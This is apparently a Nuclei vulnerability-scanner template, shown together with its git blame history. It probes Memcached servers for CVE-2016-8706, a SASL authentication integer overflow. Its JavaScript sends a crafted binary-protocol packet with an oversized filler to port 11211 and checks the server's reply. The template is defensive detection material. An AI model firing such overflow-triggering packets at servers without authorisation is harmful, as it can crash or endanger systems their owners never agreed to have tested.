nuclei-templates/javascript/cves/2016/CVE-2016-8706.yaml

id: CVE-2016-8706

info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.89998
    epss-percentile: 0.98714
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verfied: true
  tags: cve,cve2016,rce,js,memcached
javascript:
  - code: |
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"

      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 490a0046304402202b779e50c06772457c979559413b9c9ed1174a52656ee40abb96ea3a6fad1dc4022051980afb07dd370ab8740389b2a2fd654ee21d9e3534428f834520a9f47cab79:922c64590222798bb761d5b6d8e72950
Create CVE-2016-8706 2023-10-30 08:06:00 +00:00			`id: CVE-2016-8706`
Update CVE-2016-8706 2023-11-13 10:33:23 +00:00
Create CVE-2016-8706 2023-10-30 08:06:00 +00:00			`info:`
fix lint 2023-11-14 05:53:08 +00:00			`name: Memcached Server SASL Authentication - Remote Code Execution`
Create CVE-2016-8706 2023-10-30 08:06:00 +00:00			`author: pussycat0x`
			`severity: high`
Update CVE-2016-8706 2023-11-13 10:33:23 +00:00			`description: \|`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.`
Create CVE-2016-8706 2023-10-30 08:06:00 +00:00			`reference:`
			`- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py`
			`- https://nvd.nist.gov/vuln/detail/CVE-2016-8706`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`- http://rhn.redhat.com/errata/RHSA-2016-2819.html`
			`- http://www.debian.org/security/2016/dsa-3704`
			`- http://www.securitytracker.com/id/1037333`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.1`
			`cve-id: CVE-2016-8706`
			`cwe-id: CWE-190`
TemplateMan Update [Mon Mar 4 08:20:22 UTC 2024] :robot: 2024-03-04 08:20:22 +00:00			`epss-score: 0.89998`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`epss-percentile: 0.98714`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`cpe: cpe:2.3:a:memcached:memcached::::::::`
Create CVE-2016-8706 2023-10-30 08:06:00 +00:00			`metadata:`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`max-request: 1`
			`vendor: memcached`
			`product: memcached`
Update CVE-2016-8706 2023-11-13 10:33:23 +00:00			`verfied: true`
Create CVE-2016-8706 2023-10-30 08:06:00 +00:00			`tags: cve,cve2016,rce,js,memcached`
			`javascript:`
			`- code: \|`
			`let packet = bytes.NewBuffer();`
			`packet.Write(new Uint8Array([0x80, 0x21]))`
			`let cmd = 'stats'`
			`packet.WriteString(cmd)`
			`packet.Pack("!H", [32]);`
			`packet.Pack("!I", [1]);`
			`let buzz = Array(1000).fill("A").join('');`
			`packet.WriteString(buzz)`
			`const c = require("nuclei/net");`
			let conn = c.Open('tcp', `${Host}:${Port}`);
			`conn.SendHex(packet.Hex());`
			`conn.RecvString();`
			`args:`
			`Host: "{{Host}}"`
			`Port: 11211`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "Invalid arguments"`

			`- type: word`
			`words:`
			`- "Auth failure"`
			`negative: true`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 490a0046304402202b779e50c06772457c979559413b9c9ed1174a52656ee40abb96ea3a6fad1dc4022051980afb07dd370ab8740389b2a2fd654ee21d9e3534428f834520a9f47cab79:922c64590222798bb761d5b6d8e72950`